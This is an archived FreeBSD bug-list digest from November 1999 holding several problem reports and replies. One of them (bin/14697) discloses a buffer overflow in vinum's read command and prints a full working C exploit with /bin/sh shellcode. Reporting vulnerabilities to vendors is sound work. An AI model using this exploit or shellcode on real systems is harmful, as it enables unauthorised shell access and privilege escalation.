X-Send-Pr-Version: www-1.0 Subject: i386/14689: waitpid doesn't harvest child process when program run under cron Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14689 >Category: i386 >Synopsis: waitpid doesn't harvest child process when program run under cron >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Nov 3 11:40:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: William King >Release: 3.3 >Organization: ISC >Environment: FreeBSD trantor.rc.vix.com 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999 jkh@highwing.cdrom.com:/usr/src/sys/compile/GENERIC i386 >Description: waitpid(pid, &status, 0) doesn't harvest a child process when used in a program compiled with -D_REENTRANT, linked with libc_r.a and run from cron. The program forks. the parent waits for the child using waitpid(pid, &status, 0). the parent times out the waitpid with a sigalrm. the child sleeps and then exits. the waitpid call times out. The problem occurs only when the program is run from cron, compiled with -D_REENTRANT and linked with libc_r.a >How-To-Repeat: contact me for code to reproduce the problem >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 3 16:11: 1 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 771DC155DA for ; Wed, 3 Nov 1999 16:10:52 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA07754; Wed, 3 Nov 1999 16:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 7939C15661; Wed, 3 Nov 1999 16:04:41 -0800 (PST) Message-Id: <19991104000441.7939C15661@hub.freebsd.org> Date: Wed, 3 Nov 1999 16:04:41 -0800 (PST) From: kienow@infinet.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: bin/14697: Exploitable buffer overflow in Vinum (FreeBSD 3.3-STABLE, others?) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14697 >Category: bin >Synopsis: Exploitable buffer overflow in Vinum (FreeBSD 3.3-STABLE, others?) >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Nov 3 16:10:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Matthew >Release: FreeBSD 3.3-STABLE >Organization: >Environment: >Description: The other day I discovered that Vinum on FreeBSD 3.3-STABLE is vulnerable to a buffer overflow. I am not sure of any other versions of FreeBSD having this same vulnerability, but I assume from 3.0 - 3.3 this exists because vinum was added into FreeBSD 3.0 . The vulnerability exists in the routine that handles the 'read' command. $ man vinum . . . read disk [disk...] Read the vinum configuration from the specified disks. . . . The vinum_read routine is found in the commands.c located in the /usr/src/sbin/vinum/ directory. -------------------------------- . . . 165: void 166: vinum_read(int argc, char *argv[], char *arg0[]) 167: { 168: int error; 169: char buffer[BUFSIZE]; // read config file in here 170: struct _ioctl_reply *reply; 171: int i; 172: 173: reply = (struct _ioctl_reply *) &buffer; 174: if (argc < 1) { // wrong arg count 175: fprintf(stderr, "Usage: read drive [drive ...]\n"); 176: return; 177: } 178: strcpy(buffer, "read "); 179: for (i = 0; i < argc; i++) { // each drive name 180: strcat(buffer, argv[i]); 181: strcat(buffer, " "); 182: } . . . -------------------------------- The vulnerable code is on line 180, where strcat is used to copy data from the command line into buffer. Since strcat does not perform any boundary checking on the data being copied into buffer, the buffer can be overrun. Next, how big is this buffer? BUFSIZE is defined in the vinumio.h located in the /usr/src/sys/dev/vinum/ directory. Now we know that BUFSIZE is 1024 bytes and thus buffer can hold 1024 bytes, so we will try to overrun it by 100 bytes. After a little toying around we find that an offset of -405, will give us the address of 0xbfbfde3d and an eggsize of 4096, will give us our shell. (depending upon the shell code used) By default vinum is not SETUID, so I assume it doesn't prove to be an immediate danger. But under other circumstances it might prove a greater danger? Sorry this is the first hole I have discovered, so I am learning. ;) --------- CUT HERE --------- /* * vinum_exploit.c * * Vinum (Logical Volume Manager control program) exploit discovered by * Matthew Kienow (kienow@infinet.com) on Tuesday November 2, 1999. * Vinum is vulnerable on FreeBSD 3.3-STABLE, I am not sure of any others, * because I do not have access to any other computers running FreeBSD at * this time. But I assume from 3.0 - 3.3 this exists because vinum was added * into FreeBSD 3.0 . * Note: You should not have to run this program with any arguments, because * everything is set as default. * * Thanks to Aleph One for his paper 'Smashing The Stack For Fun And Profit'. * This code is just a modified version of exploit4.c from 'Smashing The Stack For Fun And Profit'. */ #include #define DEFAULT_OFFSET -405 #define DEFAULT_BUFFER_SIZE 1124 #define DEFAULT_EGG_SIZE 4096 #define NOP 0x90 char shellcode[]= /* mudge@lopht.com */ "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh"; unsigned long get_esp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr, *egg; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i, eggsize=DEFAULT_EGG_SIZE; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) eggsize = atoi(argv[3]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(egg = malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_esp() - offset; printf("-***] Using address: 0x%x\t offset: %d\t egg:%d\n\n", addr, offset, eggsize); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg,"EGG=",4); putenv(egg); memcpy(buff,"RET=",4); putenv(buff); system("/sbin/vinum read $RET"); } --------- CUT HERE --------- >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 3 16:40:21 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 38FE61567B for ; Wed, 3 Nov 1999 16:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA09944; Wed, 3 Nov 1999 16:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 5416A15619; Wed, 3 Nov 1999 16:39:55 -0800 (PST) Message-Id: <19991104003955.5416A15619@hub.freebsd.org> Date: Wed, 3 Nov 1999 16:39:55 -0800 (PST) From: sherwin@FreeBSD.ORG To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/14698: A html gnats test Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14698 >Category: misc >Synopsis: A html gnats test >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Nov 3 16:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: sherwin >Release: >Organization: trelos >Environment: >Description: >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 3 17: 5:50 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3A64814D70; Wed, 3 Nov 1999 17:05:38 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA11408; Wed, 3 Nov 1999 17:04:36 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Wed, 3 Nov 1999 17:04:36 -0800 (PST) From: Message-Id: <199911040104.RAA11408@freefall.freebsd.org> To: sherwin@FreeBSD.ORG, cpiazza@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/14698: A html gnats test Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: A html gnats test State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Wed Nov 3 17:04:29 PST 1999 State-Changed-Why: Bogus PR To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 3 19: 3:49 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2806A1556E; Wed, 3 Nov 1999 19:03:41 -0800 (PST) (envelope-from ghelmer@FreeBSD.org) Received: (from ghelmer@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA20724; Wed, 3 Nov 1999 19:02:17 -0800 (PST) (envelope-from ghelmer@FreeBSD.org) Date: Wed, 3 Nov 1999 19:02:17 -0800 (PST) From: Message-Id: <199911040302.TAA20724@freefall.freebsd.org> To: dmaddox@conterra.com, ghelmer@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/12497: src/etc/periodic/daily/150.clean-hoststat is not installed Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: src/etc/periodic/daily/150.clean-hoststat is not installed State-Changed-From-To: open->closed State-Changed-By: ghelmer State-Changed-When: Wed Nov 3 21:01:17 CST 1999 State-Changed-Why: Fix committed (src/etc/periodic/daily/Makefile v 1.4). Thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 3 19:31:39 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DBB3415483 for ; Wed, 3 Nov 1999 19:31:35 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA22846; Wed, 3 Nov 1999 19:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 930AB14C85; Wed, 3 Nov 1999 19:28:28 -0800 (PST) Message-Id: <19991104032828.930AB14C85@hub.freebsd.org> Date: Wed, 3 Nov 1999 19:28:28 -0800 (PST) From: rod@zort.on.ca To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/14700: libmikmod upgrade Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14700 >Category: misc >Synopsis: libmikmod upgrade >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Nov 3 19:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Rod Taylor >Release: >Organization: Zort >Environment: >Description: Libmikmod upgraded to 3.1.8 from 3.1.7 >How-To-Repeat: >Fix: change: DISTNAME = libmikmod-3.1.7 to: DISTNAME= libmikmod-3.1.8 make fetch; make makesum All fixed... (Sorry for the lack of a patch. Forgot to backup the old copy before making changes. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 3 20:13:57 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7084314CF0; Wed, 3 Nov 1999 20:13:55 -0800 (PST) (envelope-from chris@FreeBSD.org) Received: (from chris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA26763; Wed, 3 Nov 1999 20:11:52 -0800 (PST) (envelope-from chris@FreeBSD.org) Date: Wed, 3 Nov 1999 20:11:52 -0800 (PST) From: Message-Id: <199911040411.UAA26763@freefall.freebsd.org> To: chris@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: misc/14700: libmikmod upgrade Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: libmikmod upgrade Responsible-Changed-From-To: freebsd-bugs->freebsd-ports Responsible-Changed-By: chris Responsible-Changed-When: Wed Nov 3 20:10:27 PST 1999 Responsible-Changed-Why: Misfiled PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Nov 3 23:44:48 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BD0D714F17; Wed, 3 Nov 1999 23:44:16 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA44878; Wed, 3 Nov 1999 23:44:13 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Wed, 3 Nov 1999 23:44:13 -0800 (PST) From: Message-Id: <199911040744.XAA44878@freefall.freebsd.org> To: cpiazza@FreeBSD.org, freebsd-bugs@FreeBSD.org, grog@FreeBSD.org Subject: Re: bin/14697: Exploitable buffer overflow in Vinum (FreeBSD 3.3-STABLE, others?) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Exploitable buffer overflow in Vinum (FreeBSD 3.3-STABLE, others?) Responsible-Changed-From-To: freebsd-bugs->grog Responsible-Changed-By: cpiazza Responsible-Changed-When: Wed Nov 3 23:44:05 PST 1999 Responsible-Changed-Why: Grog's program To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 1: 6:34 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 801D014C9C; Thu, 4 Nov 1999 01:06:32 -0800 (PST) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA51676; Thu, 4 Nov 1999 01:06:32 -0800 (PST) (envelope-from ru@FreeBSD.org) Date: Thu, 4 Nov 1999 01:06:32 -0800 (PST) From: Message-Id: <199911040906.BAA51676@freefall.freebsd.org> To: rfg@monkeys.com, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/14688: kernel firewall code doesn't log port #'s for `Fragment's Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: kernel firewall code doesn't log port #'s for `Fragment's State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Thu Nov 4 00:57:27 PST 1999 State-Changed-Why: This is because source and destination port numbers are part of the corresponding protocol header (TCP or UDP), not an IP header, and are only available in the first IP fragment (with a zero offset). Please refer to RFC791, RFC793 and RFC1858 for further details. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 5:30:30 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DA9AD15749 for ; Thu, 4 Nov 1999 05:30:24 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA72712; Thu, 4 Nov 1999 05:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 4 Nov 1999 05:30:02 -0800 (PST) Message-Id: <199911041330.FAA72712@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Kazutaka YOKOTA Subject: Re: conf/14667: [FIX] wrong swissgerman/swissfrench ISO-keymaps Reply-To: Kazutaka YOKOTA Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR conf/14667; it has been noted by GNATS. From: Kazutaka YOKOTA To: mb@imp.ch Cc: freebsd-gnats-submit@freebsd.org, yokota@zodiac.mech.utsunomiya-u.ac.jp Subject: Re: conf/14667: [FIX] wrong swissgerman/swissfrench ISO-keymaps Date: Thu, 04 Nov 1999 22:30:16 +0900 >>Number: 14667 >>Category: conf >>Synopsis: [FIX] wrong swissgerman/swissfrench ISO-keymaps >>Confidential: no >>Severity: non-critical >>Priority: low [...] >>Originator: Blapp Martin >>Release: All FreeBSD >>Organization: >Improware AG >>Environment: >STABLE / CURRENT >>Description: >The swissgerman/swissfrench iso-keymaps are completly wrong. They are >cp850, not ISO_8859-1. And some key's in the old map are wrong too. ~~~~~~~~~~~~~~~~~~~~~!!! Phew, this is a major mistake. Why no one else has noticed this before? >>Fix: >http://www.attic.ch/keymaps.html (If you know german) > >else just: > >http://www.attic.ch/keymaps/swissgerman-1.iso.kbd >http://www.attic.ch/keymaps/swissgerman-2.iso.kbd >http://www.attic.ch/keymaps/swissgerman.cp850.kbd >http://www.attic.ch/keymaps/swissfrench.iso.kbd >http://www.attic.ch/keymaps/swissfrench.cp850.kbd > >I'm still testing these keymaps and I'd like that people >test them. Please report any errors to me. Please contact >me (mb@imp.ch) before committing them. Thanks for the fixes. A couple of questions: What is the difference between swissgerman-1.iso.kbd and swissgerman-2.iso.kbd? I cannot read explanation in http://www.attic.ch/keymaps.html ;-( Do swiss keyboards have `dead' keys (or `accent' keys) with which you generate accented characters? Many European language keymaps have a keymap with `dead' key definitions and another keymap without `dead' key definitions (for example, fr.iso.acc.kbd and fr.iso.kbd). >(Yokota/SOS): Does a reference ISO-keymap exist and is I am afraid not. >there a list of the important special key's with their >meaning ? Um, how about this? 101 keyboard 84 keyboard function ------------------------------------------------------------------------ Ctrl-Alt-Delete Ctrl-Alt-Delete reboot Ctrl-Alt-Esc Ctrl-Alt-Esc debug Ctrl-Alt-Space Ctrl-Alt-Space susp ScrollLock ScrollLock slock PrintScreen Shift-(Numpad *)/PrintScreen nscr Ctrl-PrintScreen Shift-Ctrl-(Numpad *)/PrintScreen debug Alt-PrintScreen/SysRq SysRq nop Pause Ctrl-NumLock slock Shift-Pause Shift-Ctrl-NumLock saver Alt-Pause Alt-Ctrl-NumLock susp Ctrl-Pause/Break Ctrl-ScrollLock/Break nop Left W*ndow key NA fkey62 Right W*ndow key NA fkey63 Menu NA fkey64 Kazu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 6:10:10 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C9CA21581D for ; Thu, 4 Nov 1999 06:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA75482; Thu, 4 Nov 1999 06:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id A657A1574C; Thu, 4 Nov 1999 06:02:59 -0800 (PST) Message-Id: <19991104140259.A657A1574C@hub.freebsd.org> Date: Thu, 4 Nov 1999 06:02:59 -0800 (PST) From: timj@systembureau.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/14706: No localhost interface / sysinstall coredumps Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14706 >Category: misc >Synopsis: No localhost interface / sysinstall coredumps >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Nov 4 06:10:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Tim Jansen >Release: 3.3 >Organization: systembureau gmbh >Environment: FreeBSD fizz.systembureau.com 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999 jkh@highwing.cdrom.com:/usr/src/sys/compile/GENERIC i386 >Description: I have installed a FreeBSD 3.3 machine, and it does not have a localhost interface. As far as I can remember, I have done the network configuration after installing bsd, and have played with it a little bit. However, I have not worked manually on the configuration files to get this result. There is also a second problem: when I enter the sysinstall menu, go to configuration/networking and select "interfaces", I get the following question: "Running multi-user, assume that the network is already configured?" When I answer yes, the sysinstall coredumps with a segmentation fault. (when I answer no, everything seems to be ok and I can reconfigure the network interface - but after that the problems are still the same) fizz# /sbin/ifconfig -a xl0: flags=8843 mtu 1500 inet 194.176.4.34 netmask 0xfffffff8 broadcast 194.176.4.39 ether 00:60:97:17:48:3b media: 10baseT/UTP (autoselect) supported media: autoselect 100baseTX 100baseTX 100baseTX 10baseT/UTP 10baseT/UTP 10baseT/UTP lp0: flags=8810 mtu 1500 tun0: flags=8010 mtu 1500 sl0: flags=c010 mtu 552 ppp0: flags=8010 mtu 1500 lo0: flags=8008 mtu 16384 Contents of /etc/rc.conf: # This file now contains just the overrides from /etc/defaults/rc.conf # please make all changes to this file. # -- sysinstall generated deltas -- # nfs_server_enable="YES" nfs_client_enable="YES" tcp_extensions="YES" # -- sysinstall generated deltas -- # ifconfig_xl0="inet 194.176.4.34 netmask 255.255.255.248" defaultrouter="194.176.4.32" network_interfaces="xl0 auto" hostname="fizz.systembureau.com" # -- sysinstall generated deltas -- # ifconfig_xl0="inet 194.176.4.34 netmask 255.255.255.248" defaultrouter="194.176.4.33" hostname="fizz.systembureau.com" I have edited rc.conf and corrected (at least I think so) the contradictions in the rc.conf, but I still dont have a localhost interface, and sysinstall still crashes: # This file now contains just the overrides from /etc/defaults/rc.conf # please make all changes to this file. # -- sysinstall generated deltas -- # nfs_server_enable="YES" nfs_client_enable="YES" tcp_extensions="YES" # -- sysinstall generated deltas -- # ifconfig_xl0="inet 194.176.4.34 netmask 255.255.255.248" defaultrouter="194.176.4.33" network_interfaces="xl0 auto" hostname="fizz.systembureau.com" No local host: [fizz:~]/sbin/ping 127.0.0.1 PING 127.0.0.1 (127.0.0.1): 56 data bytes ^C --- 127.0.0.1 ping statistics --- 4 packets transmitted, 0 packets received, 100% packet loss >How-To-Repeat: I can reproduce the sysinstall crash on the machine. However, I cannot remember what exactly I did to get a system without localhost. >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 6:50:11 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EDBDA14CF8 for ; Thu, 4 Nov 1999 06:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA30473; Thu, 4 Nov 1999 06:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 4 Nov 1999 06:50:02 -0800 (PST) Message-Id: <199911041450.GAA30473@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sheldon Hearn Subject: Re: i386/14689: waitpid doesn't harvest child process when program run under cron Reply-To: Sheldon Hearn Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR i386/14689; it has been noted by GNATS. From: Sheldon Hearn To: wpk@isc.org Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: i386/14689: waitpid doesn't harvest child process when program run under cron Date: Thu, 04 Nov 1999 16:14:07 +0200 On Wed, 03 Nov 1999 11:38:18 PST, wpk@isc.org wrote: > The program forks. > the parent waits for the child using waitpid(pid, &status, 0). > the parent times out the waitpid with a sigalrm. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > the child sleeps and then exits. > the waitpid call times out. ^^^^^^^^^^^^^^^^^^^^^^ Impossible. Perhaps you should send some sample code? Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 8: 0:38 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2654D14C58 for ; Thu, 4 Nov 1999 08:00:36 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA37263; Thu, 4 Nov 1999 08:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 4 Nov 1999 08:00:01 -0800 (PST) Message-Id: <199911041600.IAA37263@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Adam Szilveszter Subject: Re: misc/14706: No localhost interface / sysinstall coredumps Reply-To: Adam Szilveszter Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR misc/14706; it has been noted by GNATS. From: Adam Szilveszter To: timj@systembureau.com Cc: freebsd-gnats-submit@freebsd.org Subject: Re: misc/14706: No localhost interface / sysinstall coredumps Date: Thu, 4 Nov 1999 17:10:27 +0100 (CET) Hi! As for the "no localhost" problem, see the Errata file on www.freebsd.org and correct the entry in your /etc/rc.conf which says network_interfaces="xl0 auto" to "xl0 lo0" This is a known problem in -RELEASE, which is fixed in -STABLE. After this (and a reboot) try sysinstall again. Chances are things will get all right again. Cheers! Szilveszter ADAM ------------------------------------------------------------------------------- * Adam Szilveszter * JATE Szeged * email: sziszi@petra.hos.u-szeged.hu * * Homepage : none * alternate email: cc@flanker.itl.net.ua * * Finger sziszi@petra.hos.u-szeged.hu for PGP key. * * I prefer using the door instead of Windows(tm)... * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 8:20:55 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 191AB157D6 for ; Thu, 4 Nov 1999 08:20:47 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA39208; Thu, 4 Nov 1999 08:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 4 Nov 1999 08:20:01 -0800 (PST) Message-Id: <199911041620.IAA39208@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Andrew Heybey Subject: Re: kern/10243: Under heavy disk and network load read(2) can return garbage. Reply-To: Andrew Heybey Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/10243; it has been noted by GNATS. From: Andrew Heybey To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: kern/10243: Under heavy disk and network load read(2) can return garbage. Date: Thu, 04 Nov 1999 11:14:10 -0500 Just a note that this corruption bug seems to have been solved by the commit to sys/dev/aic7xxx/aix7xxx.seq revision 1.91 on 20-Sep-99. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Nov 4 8:30:56 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8469114F3C for ; Thu, 4 Nov 1999 08:30:52 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA40191; Thu, 4 Nov 1999 08:30:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 4 Nov 1999 08:30:03 -0800 (PST) Message-Id: <199911041630.IAA40191@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sheldon Hearn Subject: Re: i386/14689: waitpid doesn't harvest child process when program run under cron Reply-To: Sheldon Hearn Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR i386/14689; it has been noted by GNATS. From: Sheldon Hearn To: William King Cc: freebsd-gnats-submit@freebsd.org Subject: Re: i386/14689: waitpid doesn't harvest child process when program run under cron Date: Thu, 04 Nov 1999 18:24:11 +0200 On Thu, 04 Nov 1999 